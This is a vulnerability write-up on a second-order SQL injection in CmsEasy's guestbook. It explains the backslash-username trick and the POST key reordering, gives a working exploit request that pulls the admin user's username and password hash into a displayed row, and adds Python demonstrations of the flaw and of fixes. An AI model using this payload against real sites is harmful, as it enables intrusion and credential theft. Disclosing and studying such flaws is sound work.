Cmseasy SQL injection vulnerability 2

Source: Internet
Author: User


An unrestricted injection.

front_class.php filters the username for quote characters, but forgets the backslash escape character (\):

    if (preg_match('/(\'|")/', $_POST['username'])
        || preg_match('/(\'|")/', $_GET['username'])
        || preg_match('/(\'|")/', $_COOKIE['login_username'])) {
        exit('invalid parameter');
    }

A username ending in a single backslash passes this check, and inside a MySQL string literal that backslash escapes the closing quote that follows it.
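As an added example (not CmsEasy's code), the following Python reproduces the quote-only check above beside a hardened allow-list check, and then scans a spliced INSERT the way MySQL reads single-quoted literals, so you can see the value boundary move when a trailing backslash is present and see it stay put once every value is escaped (the job mysql_real_escape_string does in PHP; a prepared statement is the better fix). The sample username and content, the two-column table and the allow-list pattern are constructed assumptions.

```python
import re

# The check in front_class.php as the page shows it: only ' and " are rejected.
QUOTES_ONLY = re.compile(r"""['"]""")

# Hardened check (assumed replacement, not CmsEasy's code): allow-list the username
# to letters, digits and underscore, which excludes \ as well as both quote characters.
USERNAME_ALLOWED = re.compile(r"[A-Za-z0-9_]{3,20}")


def original_filter_rejects(username):
    return QUOTES_ONLY.search(username) is not None


def hardened_filter_rejects(username):
    return USERNAME_ALLOWED.fullmatch(username) is None


def mysql_escape(value):
    """Escape the characters MySQL treats specially inside a quoted literal
    (what mysql_real_escape_string does in PHP). Backslash must be handled first."""
    for raw, esc in (("\\", "\\\\"), ("\0", "\\0"), ("'", "\\'"), ('"', '\\"'),
                     ("\n", "\\n"), ("\r", "\\r")):
        value = value.replace(raw, esc)
    return value


def build_insert(username, content):
    """Naive string splicing, the way rec_insert() builds the statement from the array."""
    return ("INSERT INTO cmseasy_guestbook (username, content) "
            "VALUES ('%s', '%s')" % (username, content))


def mysql_string_literals(sql):
    """Scan a statement the way MySQL reads single-quoted literals: a backslash
    escapes the next character and '' is an embedded quote. Returns the literal
    bodies the server would see, so we can check whether value boundaries survived."""
    unescape = {"n": "\n", "r": "\r", "0": "\0", "t": "\t"}
    literals, i, n = [], 0, len(sql)
    while i < n:
        if sql[i] != "'":
            i += 1
            continue
        i += 1
        buf = []
        while i < n:
            c = sql[i]
            if c == "\\" and i + 1 < n:
                buf.append(unescape.get(sql[i + 1], sql[i + 1]))
                i += 2
            elif c == "'" and i + 1 < n and sql[i + 1] == "'":
                buf.append("'")
                i += 2
            elif c == "'":
                i += 1
                break
            else:
                buf.append(c)
                i += 1
        literals.append("".join(buf))
    return literals


def demo(username="123123\\", content="hello"):
    """Constructed sample: the page's username with a trailing backslash."""
    naive = build_insert(username, content)
    escaped = build_insert(mysql_escape(username), mysql_escape(content))
    return {
        "original_filter_rejects": original_filter_rejects(username),
        "hardened_filter_rejects": hardened_filter_rejects(username),
        "naive_literals": mysql_string_literals(naive),
        "escaped_literals": mysql_string_literals(escaped),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

With the naive splice the first literal MySQL sees is "123123', " (the username has swallowed its own closing quote and the separator) and the content value is no longer inside any literal; after escaping, the literals are exactly the two values that were supplied.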





First, register an account.

user_act.php line 289:

    function register_action() {
        if (front::post('submit')) {
            if (!config::get('reg_on')) {
                front::flash(lang('the website has closed registration!'));
                return;
            }
            if (config::get('verifycode')) {
                if (!session::get('verify') || front::post('verify') != session::get('verify')) {
                    front::flash(lang('verification code error!'));
                    return;
                }
            }
            if (front::post('username') != strip_tags(front::post('username'))
                || front::post('username') != htmlspecialchars(front::post('username'))) {
                front::flash(lang('invalid username!'));
                return;
            }
            // ... remainder of the function omitted on the page
        }
    }

The rest of registration is skipped here; it places few restrictions on the username, and neither strip_tags() nor htmlspecialchars() alters a backslash.

We register the account 123123\.



Let's look at the login logic.

user_act.php line 176:

    // After a successful login the cookie is set from the POST value ($user = $data below).

Because of escaping, the cookie may not come out as exactly 123123\; just set the login_username cookie to 123123\ manually.

    function login_action() {
        if (!$this->loginfalsemaxtimes()) {
            if (front::post('submit')) {
                if (config::get('verifycode')) {
                    if (!session::get('verify') || front::post('verify') <> session::get('verify')) {
                        front::flash(lang('verification code error!') . "<a href=''>" . lang('background') . "</a>");
                        return;
                    }
                }
                if (front::post('username') && front::post('password')) {
                    $username = front::post('username');
                    $password = md5(front::post('password'));
                    $data = array('username' => $username, 'password' => $password);
                    $user = new user();
                    $user = $user->getrow(array('username' => $data['username'], 'password' => $data['password']));
                    if (!is_array($user)) {
                        $this->login_false();
                        return;
                    }
                    $user = $data;
                    cookie::set('login_username', $user['username']);
                    cookie::set('login_password', front::cookie_encode($user['password']));
                    session::set('username', $user['username']);
                    $this->view->from = front::post('from') ? front::post('from') : front::$from;
                    front::flash($this->fetch('user/login_success.html'));
                    return;
                } else {
                    $this->login_false();
                    return;
                }
            }
        }
        $this->view->ologinlist = ologin::getInstance()->getrows('', 50);
    }

Now the guestbook (message) function.

    // Check the login status
    function init() {
        if (!config::get('guestbook_enable')) {
            alerterror('message book function disabled');
        }
        $user = '';
        if (cookie::get('login_username') && cookie::get('login_password')) {
            $user = new user();
            $user = $user->getrow(array('username' => cookie::get('login_username')));
        }
        $this->view->user = $user; // put data
    }







guestbook_act.php lines 28-94:

    function index_action() {
        $this->list_action();
        if (front::post('submit')) {
            if (!front::post('guesttel')) {
                front::flash(lang('Please fill in the contact number!'));
                return false;
            }
            if (!front::post('title')) {
                front::flash(lang('enter the title!'));
                return false;
            }
            if (!front::post('content')) {
                front::flash(lang('select the content!'));
                return false;
            }
            if (config::get('verifycode')) {
                if (front::post('verify') <> session::get('verify')) {
                    front::flash(lang('verification code error!'));
                    return false;
                }
            }
            front::$post['checked'] = 0;
            // This is the key: if a logged-in user exists, its username (123123\) is copied
            // into the row, and in the SQL the backslash escapes the quote that follows it.
            if (empty($this->view->user)) {
                front::$post['userid'] = 0;
                front::$post['username'] = 'tourist:' . front::$post['nickname'];
            } else {
                front::$post['userid'] = $this->view->user['userid'];
                front::$post['username'] = $this->view->user['username'];
            }
            front::$post['adddate'] = date('Y-m-d H:i:s');
            front::$post['ip'] = front::ip();
            if (!get_magic_quotes_gpc()) {
                front::$post['content'] = front::$post['content']; // no-op: nothing is escaped here
            }
            front::$post['title'] = strip_tags(front::$post['title']);
            $data = front::$post;
            $insert = $this->_table->rec_insert($data); // splices the statement together and runs it
            if ($insert < 1) {
                front::flash(lang('message failed!'));
            } else {
                if (config::get('email_gust_send_cust') && front::$post['gustemail']) {
                    $title = "you are in " . config::get('sitename') . " The message has been submitted";
                    $this->sendmail(front::$post['gustemail'], $title, $title);
                }
                if (config::get('email_guest_send_admin') && config::get('email')) {
                    $title = 'website in ' . date('Y-m-d H:i:s') . 'A new message has been sent';
                    $this->sendmail(config::get('email'), $title, $title);
                }
                if (config::get('sms_on') && config::get('sms_guestbook_on')) {
                    sendMsg(front::$post['guesttel'], config::get('sms_guestbook'));
                }
                if (config::get('sms_on') && config::get('sms_guestbook_admin_on') && $mobile = config::get('site_mobile')) {
                    sendMsg($mobile, front::$post['username'] . 'In ' . date('Y-m-d H:i:s') . 'login');
                }
                front::flash(lang('message successful!'));
                $this->view->submit_success = true;
                if (front::get('t') == 'wap') {
                    front::redirect(url::create('guestbook/index/t/wap/success/' . time()));
                } else {
                    front::redirect(url::create('guestbook/index/success/' . time()));
                }
            }
        }
    }





The resulting statement (the numeric values in this log line are garbled in the source; the column order is the point):

    INSERT INTO `cmseasy_guestbook`(guesttel,guestemail,guestqq,title,content,userid,username,adddate) VALUES ('20170101','20160301','20160301','ss','123','3','1970\','2017-06-25 15:35:43')

123123\ is our username. Is it really not under our control? The lines that copy it into the row are:

    front::$post['userid'] = $this->view->user['userid'];
    front::$post['username'] = $this->view->user['username'];
    }
    front::$post['adddate'] = date('Y-m-d H:i:s');
    front::$post['ip'] = front::ip();



Add a var_dump() of the array just before the insert:

    array(13) {
      ["nickname"]=> string(8) "11111111"
      ["guesttel"]=> string(3) "123"
      ["guestemail"]=> string(6) "123123"
      ["guestqq"]=> string(6) "123123"
      ["title"]=> string(2) "ss"
      ["content"]=> string(6) "123213"
      ["verify"]=> string(4) "3VTQ"
      ["submit"]=> string(6) "????o¤"
      ["checked"]=> int(0)
      ["userid"]=> string(1) "3"
      ["username"]=> string(10) "123123213\"
      ["adddate"]=> string(19) "2014-06-25 15:39:36"
      ["ip"]=> string(9) "125.0.1.5"
    }





Since $_POST is an array, the order of its keys can be changed by the client. These four keys always appear at the end:

    ["userid"]=> string(1) "3"
    ["username"]=> string(10) "123123213\"
    ["adddate"]=> string(19) "2014-06-25 15:39:36"
    ["ip"]=> string(9) "125.0.1.5"





Why are they always at the end? Because they are assigned last, so PHP appends them to the array as new keys.

If the form already contains a username field, the key exists before index_action() assigns to it, and an assignment to an existing key keeps its position. That gives the server-assigned username a position of our choosing:

    guesttel=123&nickname=11111111&guestemail=123123&guestqq=123123&title=ss&username=il&content=123213&verify=3vtq&submit=+%E6%8F%90%E4%BA%A4+

The array and the statement built from it:

    array(13) {
      ["guesttel"]=> string(3) "123"
      ["nickname"]=> string(8) "11111111"
      ["guestemail"]=> string(6) "123123"
      ["guestqq"]=> string(6) "123123"
      ["title"]=> string(2) "ss"
      ["username"]=> string(10) "123123213\"
      ["content"]=> string(6) "123213"
      ["verify"]=> string(4) "3VTQ"
      ["submit"]=> string(6) "????o¤"
      ["checked"]=> int(0)
      ["userid"]=> string(1) "3"
      ["adddate"]=> string(19) "2014-06-25 15:42:59"
      ["ip"]=> string(9) "125.0.1.5"
    }

    INSERT INTO `cmseasy_guestbook`(guesttel,guestemail,guestqq,title,username,content,userid,adddate) VALUES ('123','123123','123123','ss','123123213\','123213','3','2014-06-25 15:42:59')





Because the guestbook page displays only the username and the content, the content field is placed directly after username and carries the injected part.

Exp:

    guesttel=123&nickname=11111111&guestemail=123123&guestqq=123123&title=ss&username=a&content=,(select concat(USERNAME,0x7c,PASSWORD) FROM cmseasy_user where userid=1),90%)#&verify=3vtq&submit=+%E6%8F%90%E4%BA%A4+

SQL log (the numeric values are garbled in the source):

    INSERT INTO `cmseasy_guestbook`(guesttel,guestemail,guestqq,title,username,content,userid,adddate) VALUES ('20170101','20160301','20160301','ss','2017\',',(select concat(USERNAME,0x7c,PASSWORD) FROM cmseasy_user where userid=1),123123213)#','3','2017-06-25 15:49:18')

The backslash at the end of the username swallows the quote after it, so the content value continues the username literal, and the # comments out the remaining columns.



list_action() queries the guestbook rows for the template, so the inserted row, including the selected data, is displayed on the page.

Another point: when the statement is spliced together, the whole POST array is used, so a client who knows the table's other columns can write them simply by adding form fields with those names:

    $data = front::$post;
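The key-order behaviour described above and the whole-array splice in $data = front::$post; can be shown together. The following Python is an added example, not CmsEasy's code: Python dicts, like PHP arrays, keep insertion order and keep an existing key's position when it is reassigned, so a mirror of index_action()'s assignments reproduces the var_dump order shown on the page, while the hardened builder copies only an allow-listed set of guest columns in a fixed, server-chosen order. The POST bodies mirror the page's values; the allow-list, the fixed date and IP, and the key 'some_other_column' are constructed.

```python
# Constructed POST bodies mirroring the two requests shown on the page
# (verify/submit omitted; 'some_other_column' is a made-up column name).
POST_DEFAULT = {"nickname": "11111111", "guesttel": "123", "guestemail": "123123",
                "guestqq": "123123", "title": "ss", "content": "123213"}
POST_WITH_USERNAME = {"guesttel": "123", "nickname": "11111111", "guestemail": "123123",
                      "guestqq": "123123", "title": "ss", "username": "il",
                      "content": "123213", "some_other_column": "x"}

# Constructed stand-in for the logged-in user row (the page's user has userid 3).
LOGGED_IN_USER = {"userid": "3", "username": "123123\\"}

# Assumed allow-list of guest-supplied columns; the real table may differ.
GUEST_COLUMNS = ("guesttel", "guestemail", "guestqq", "title", "content")

FIXED_DATE = "2014-06-25 15:42:59"   # stand-in for date('Y-m-d H:i:s')
FIXED_IP = "125.0.1.5"               # stand-in for front::ip()


def fill_like_index_action(post, user):
    """Mirror of the assignments in index_action(): server fields are written
    into the request array. Reassigning an existing key keeps its position and
    new keys are appended, in Python dicts just as in PHP arrays."""
    row = dict(post)
    row["checked"] = 0
    row["userid"] = user["userid"]
    row["username"] = user["username"]
    row["adddate"] = FIXED_DATE
    row["ip"] = FIXED_IP
    return row


def build_row_allowlisted(post, user):
    """Hardened builder: copy only known guest columns, in a fixed order, then
    add the server-controlled fields. Client-supplied 'username', 'userid' or
    unknown column names never reach the INSERT."""
    row = {col: post.get(col, "") for col in GUEST_COLUMNS}
    row["checked"] = 0
    row["userid"] = user["userid"]
    row["username"] = user["username"]
    row["adddate"] = FIXED_DATE
    row["ip"] = FIXED_IP
    return row


def column_order(row):
    """Column order rec_insert() would emit for this array."""
    return list(row.keys())


def username_precedes_content(row):
    """True when the server-assigned username sits immediately before the
    client-controlled content column."""
    cols = column_order(row)
    return cols.index("username") + 1 == cols.index("content")


if __name__ == "__main__":
    for post in (POST_DEFAULT, POST_WITH_USERNAME):
        print("naive     :", column_order(fill_like_index_action(post, LOGGED_IN_USER)))
        print("allowlist :", column_order(build_row_allowlisted(post, LOGGED_IN_USER)))
```

The naive mirror reproduces the page's two orderings exactly, including the pass-through of the unknown column; the allow-listed builder yields the same column list for both requests, so neither the position of username nor the set of written columns is client-controlled.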


 




 


 

 

Solution:

Filter the username (the backslash included), and escape every value before it is spliced into the query.
